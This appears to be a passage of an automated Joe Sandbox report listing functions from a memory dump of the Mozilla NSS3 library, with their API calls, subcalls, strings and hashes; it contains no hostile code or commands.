Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 5b4e77d5a2739a8d4c5eb9dcd9625c4404e0a00d604a361490e5679e11ba1680
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 4021D5B6A002107BEB119E58DC81EABB7A9EF45708F080168FD049B351E771DCA987F1

Function 6CAC5ED0 Relevance: 9.1, APIs: 6, Instructions: 80stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CAC5D71), ref: 6CAC5F0A
TlsGetValue.KERNEL32 ref: 6CAC5F1F
EnterCriticalSection.KERNEL32(89000904), ref: 6CAC5F2F
PR_Unlock.NSS3(890008E8), ref: 6CAC5F55
PR_SetError.NSS3(00000000,00000000), ref: 6CAC5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6CAC5F7D

Part of subcall function 6CAC5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6CAC5F82,8B4274C0), ref: 6CAC5248
Part of subcall function 6CAC5220: EnterCriticalSection.KERNEL32(0F6CB90D,?,6CAC5F82,8B4274C0), ref: 6CAC525C
Part of subcall function 6CAC5220: PR_SetError.NSS3(00000000,00000000), ref: 6CAC528E
Part of subcall function 6CAC5220: PR_Unlock.NSS3(0F6CB8F1), ref: 6CAC5299
Part of subcall function 6CAC5220: free.MOZGLUE(00000000), ref: 6CAC52A9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID:
API String ID: 3150690610-0
Opcode ID: e0ed62f6e6aae43d89d16cc30015dd7456c168cafe42cea3e83b4884497f17c1
Instruction ID: d7c3c501051487aadff1efe22c6e4042007b384388cd0f170f18720a22ca7234
Opcode Fuzzy Hash: e0ed62f6e6aae43d89d16cc30015dd7456c168cafe42cea3e83b4884497f17c1
Instruction Fuzzy Hash: C521B7B5D002449FDB14AF68DC41AEEB7F4EF19318F540029E90AA7741E731A958CBD1

Function 6CA7BE50 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,6CAFDC29,?), ref: 6CA7BE64

Part of subcall function 6CAD0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA787ED,00000800,6CA6EF74,00000000), ref: 6CAD1000
Part of subcall function 6CAD0FF0: PR_NewLock.NSS3(?,00000800,6CA6EF74,00000000), ref: 6CAD1016
Part of subcall function 6CAD0FF0: PL_InitArenaPool.NSS3(00000000,security,6CA787ED,00000008,?,00000800,6CA6EF74,00000000), ref: 6CAD102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000000C,?,6CAFDC29,?), ref: 6CA7BE78

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaAlloc_Util.NSS3(00000000,?,?,?,?,6CAFDC29,?), ref: 6CA7BE96

Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD116E

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,?,6CAFDC29,?), ref: 6CA7BEBB

Part of subcall function 6CACFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAC8D2D,?,00000000,?), ref: 6CACFB85
Part of subcall function 6CACFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CACFBB1

PR_SetError.NSS3(FFFFE013,00000000,?,6CAFDC29,?), ref: 6CA7BEDF
PORT_FreeArena_Util.NSS3(?,00000000,?,?,?,6CAFDC29,?), ref: 6CA7BEF3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ArenaUtil$Alloc_$AllocateArena_Value$CopyCriticalEnterErrorFreeInitItem_LockPoolSectionUnlockcallocmemcpy
String ID:
API String ID: 3111646008-0
Opcode ID: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction ID: 8cd2f6b5e679c1b7c2a73331a756b26fd8df29a2eb7dd7b2307dbeffe31ec5d2
Opcode Fuzzy Hash: 611ca16d4481621904a0b14d927bf13d40c7ced42e658f035fcec1cf4bf9e4c2
Instruction Fuzzy Hash: 3711A5B5A002055BEB109B65AD45FAE3BB8EF41258F154128EE09EB780EB31E949C7B1

Function 6CAC4820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6CAC4EB8,?), ref: 6CAC4884

Part of subcall function 6CAC8800: TlsGetValue.KERNEL32(?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8821
Part of subcall function 6CAC8800: TlsGetValue.KERNEL32(?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC883D
Part of subcall function 6CAC8800: EnterCriticalSection.KERNEL32(?,?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8856
Part of subcall function 6CAC8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAC8887
Part of subcall function 6CAC8800: PR_Unlock.NSS3(?,?,?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAC4EB8,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6CAC4EB8,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CA878F8), ref: 6CAC4899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC48A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAC48B8

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 2aff14f8c98f93dcf7957af28913c48e2067125ecd4b75e14560c89cd8ec5a74
Instruction ID: 73142ebd1adcbc87746f5163a1c4826b96a8ea7017af37a47833e03089cdc071
Opcode Fuzzy Hash: 2aff14f8c98f93dcf7957af28913c48e2067125ecd4b75e14560c89cd8ec5a74
Instruction Fuzzy Hash: 9421DB76F0428097EF005EA5DCC856A77B8FF167597080534DE094BA01E721F89887E7

Function 6CB03C80 Relevance: 9.1, APIs: 6, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6CB05B40: PR_GetIdentitiesLayer.NSS3 ref: 6CB05B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB03D3F

Part of subcall function 6CA7BA90: PORT_NewArena_Util.NSS3(00000800,6CB03CAF,?), ref: 6CA7BABF
Part of subcall function 6CA7BA90: PORT_ArenaAlloc_Util.NSS3(00000000,00000010,?,6CB03CAF,?), ref: 6CA7BAD5
Part of subcall function 6CA7BA90: PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,6CB03CAF,?), ref: 6CA7BB08
Part of subcall function 6CA7BA90: memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CB03CAF,?), ref: 6CA7BB1A
Part of subcall function 6CA7BA90: SECITEM_CopyItem_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,6CB03CAF,?), ref: 6CA7BB3B

PR_EnterMonitor.NSS3(?), ref: 6CB03CCB

Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390AB
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB390C9
Part of subcall function 6CB39090: EnterCriticalSection.KERNEL32 ref: 6CB390E5
Part of subcall function 6CB39090: TlsGetValue.KERNEL32 ref: 6CB39116
Part of subcall function 6CB39090: LeaveCriticalSection.KERNEL32 ref: 6CB3913F

PR_EnterMonitor.NSS3(?), ref: 6CB03CE2
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB03CF8
PR_ExitMonitor.NSS3(?), ref: 6CB03D15
PR_ExitMonitor.NSS3(?), ref: 6CB03D2E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Util$Monitor$EnterValue$Alloc_ArenaArena_CriticalExitSection$CopyErrorFreeIdentitiesItem_LayerLeavememset
String ID:
API String ID: 4030862364-0
Opcode ID: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction ID: 1e23daefb9d3d7cfbdebd0691f6579d2b8e6416101fc576647fbd6854ef229ea
Opcode Fuzzy Hash: e7ad2b172ce1ebdb6267d86afec6fc76fe1798d5b7f323bf4e9ea9a967b6582e
Instruction Fuzzy Hash: 021104B9B506906FE7305A65EC85F9FBAE8EB11208F500634E40EC7B20E632F81DC652

Function 6CACFDF0 Relevance: 9.1, APIs: 6, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CACFE08

Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD10F3
Part of subcall function 6CAD10C0: EnterCriticalSection.KERNEL32(?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD110C
Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1141
Part of subcall function 6CAD10C0: PR_Unlock.NSS3(?,?,?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD1182
Part of subcall function 6CAD10C0: TlsGetValue.KERNEL32(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD119C

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CACFE1D

Part of subcall function 6CAD10C0: PL_ArenaAllocate.NSS3(?,6CA78802,00000000,00000008,?,6CA6EF74,00000000), ref: 6CAD116E

PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CACFE29
PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CACFE3D
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CACFE62
free.MOZGLUE(00000000,?,?,?,?), ref: 6CACFE6F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil$AllocateValue$CriticalEnterSectionUnlockfreememcpy
String ID:
API String ID: 660648399-0
Opcode ID: 46c19ce561ab11c38d28ad6fc365fd0d2e828c266e0ea050c33103629d0fd7b1
Instruction ID: ec14b296c84e5c27bb310daca43dde960e293ccb31521d1d145cbcbab251e0c1
Opcode Fuzzy Hash: 46c19ce561ab11c38d28ad6fc365fd0d2e828c266e0ea050c33103629d0fd7b1
Instruction Fuzzy Hash: 6C1108BA700205ABEB008F55DC40A5B73B8AF58299F19803CE91C87B12E731E994C792

Function 6CB7FD90 Relevance: 9.1, APIs: 6, Instructions: 51COMMON

Download Yara Rule

APIs

PR_Lock.NSS3 ref: 6CB7FD9E

Part of subcall function 6CB39BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CA61A48), ref: 6CB39BB3
Part of subcall function 6CB39BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CA61A48), ref: 6CB39BC8

PR_WaitCondVar.NSS3(000000FF), ref: 6CB7FDB9

Part of subcall function 6CA5A900: TlsGetValue.KERNEL32(00000000,?,6CBD14E4,?,6C9F4DD9), ref: 6CA5A90F
Part of subcall function 6CA5A900: _PR_MD_WAIT_CV.NSS3(?,?,?), ref: 6CA5A94F

PR_Unlock.NSS3 ref: 6CB7FDD4
PR_Lock.NSS3 ref: 6CB7FDF2
PR_NotifyAllCondVar.NSS3 ref: 6CB7FE0D
PR_Unlock.NSS3 ref: 6CB7FE23

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: CondLockUnlockValue$CriticalEnterNotifySectionWait
String ID:
API String ID: 3365241057-0
Opcode ID: 8646625652062b80f9613ebc4fb6c172396f1da79b31f2b5c354f177b90b80fe
Instruction ID: 50be51bd14ab81809e51f563a9372d2fc8c29d44c76eafc8f47409b272f8226b
Opcode Fuzzy Hash: 8646625652062b80f9613ebc4fb6c172396f1da79b31f2b5c354f177b90b80fe
Instruction Fuzzy Hash: 43018EBAA042A09BDF158E65FD108557721FB022797184374E83A47BE1E722ED28CF82

Function 6CB06840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6CB0AA9B,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB06846

Part of subcall function 6CA61770: calloc.MOZGLUE(00000001,0000019C,?,6CA615C2,?,?,?,?,?,00000001,00000040), ref: 6CA6178D

PR_NewMonitor.NSS3(00000000,?,6CB0AA9B,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB06855

Part of subcall function 6CAC8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6CA755D0,00000000,00000000), ref: 6CAC868B
Part of subcall function 6CAC8680: PR_NewLock.NSS3(00000000,00000000), ref: 6CAC86A0
Part of subcall function 6CAC8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6CAC86B2
Part of subcall function 6CAC8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6CAC86C8
Part of subcall function 6CAC8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6CAC86E2
Part of subcall function 6CAC8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6CAC86EC
Part of subcall function 6CAC8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6CAC8700

PR_NewMonitor.NSS3(?,6CB0AA9B,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB0687D

Part of subcall function 6CA61770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA618DE
Part of subcall function 6CA61770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA618F1

PR_NewMonitor.NSS3(?,6CB0AA9B,?,?,?,?,?,?,?,00000000,?,6CB080C1), ref: 6CB0688C

Part of subcall function 6CA61770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA618FC
Part of subcall function 6CA61770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6CA6198A

PR_NewLock.NSS3 ref: 6CB068A5

Part of subcall function 6CB398D0: calloc.MOZGLUE(00000001,00000084,6CA60936,00000001,?,6CA6102C), ref: 6CB398E5

PR_NewLock.NSS3 ref: 6CB068B4

Part of subcall function 6CB398D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CB39946
Part of subcall function 6CB398D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9F16B7,00000000), ref: 6CB3994E
Part of subcall function 6CB398D0: free.MOZGLUE(00000000), ref: 6CB3995E

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: a01adaa558713cb672974fd67a14f835e3f6dc7886a4b4a49e9b251eb31f0f69
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: FF01FFB0B01B4746E7516B7649103EB7EE4AF016DAF10043A8969C5E80FF71D48C8FA2

Function 6CA5AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CA5AFDA

Strings

misuse, xrefs: 6CA5AFCE
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA5AFC4
unable to delete/modify collation sequence due to active statements, xrefs: 6CA5AF5C
%s at line %d of [%.10s], xrefs: 6CA5AFD3

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 21bce5de34d4cce4e86466e2ec4e0465aae74029094a781fec852a81d17e3cb8
Instruction ID: fc8c2cf73322ce0bca90fec590b1222585f81c35eb149a85a316556b639fcee8
Opcode Fuzzy Hash: 21bce5de34d4cce4e86466e2ec4e0465aae74029094a781fec852a81d17e3cb8
Instruction Fuzzy Hash: 2591F075B012158FDB04CF69C890ABABBF2BF45314F5D81A8E865AB791C331EC55CB60

Function 6CABFC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,pkcs11:,00000007), ref: 6CABFC55
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CABFCB2
PR_SetError.NSS3(FFFFE040,00000000), ref: 6CABFDB7
PR_SetError.NSS3(FFFFE09A,00000000), ref: 6CABFDDE

Part of subcall function 6CAC8800: TlsGetValue.KERNEL32(?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8821
Part of subcall function 6CAC8800: TlsGetValue.KERNEL32(?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC883D
Part of subcall function 6CAC8800: EnterCriticalSection.KERNEL32(?,?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8856
Part of subcall function 6CAC8800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6CAC8887
Part of subcall function 6CAC8800: PR_Unlock.NSS3(?,?,?,?,6CAD085A,00000000,?,6CA78369,?), ref: 6CAC8899

Strings

pkcs11:, xrefs: 6CABFC4F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorValue$CondCriticalEnterL_strncasecmpSectionUnlockWaitstrcmp
String ID: pkcs11:
API String ID: 362709927-2446828420
Opcode ID: 8d266e41b5c9c73317e94f2039a2f229534a003f13ef97fd038e43d183f38c36
Instruction ID: b8c298aa01419f7653a3bd6b2c8a00421839ec6bcb2e7b030dd14139b37e814d
Opcode Fuzzy Hash: 8d266e41b5c9c73317e94f2039a2f229534a003f13ef97fd038e43d183f38c36
Instruction Fuzzy Hash: EA51D0BDB051519BEB008F699D80BAA3769AB4135CF1D002DDD047BB52EB31F998CB92

Function 6C9FBDA0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 94COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(00000000,?,?), ref: 6C9FBE02

Part of subcall function 6CB29C40: memcmp.VCRUNTIME140(?,00000000,6C9FC52B), ref: 6CB29D53

sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014A8E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C9FBE9F

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C9FBE89
%s at line %d of [%.10s], xrefs: 6C9FBE98
database corruption, xrefs: 6C9FBE93

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcmp$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 1135338897-598938438
Opcode ID: 556754392d5f081d750d2774fbb4a2a0eba70686a8748a83bcaeab128617b4f7
Instruction ID: 082a86733fefc38109090eaea7c71ab8cd0b20e954b2030d2fe47e4fb270ba7d
Opcode Fuzzy Hash: 556754392d5f081d750d2774fbb4a2a0eba70686a8748a83bcaeab128617b4f7
Instruction Fuzzy Hash: 0C314835B086998BC700CF69C8D4AAFBBB6AF41314B1C8554EE682BB41D370ED06C7D0

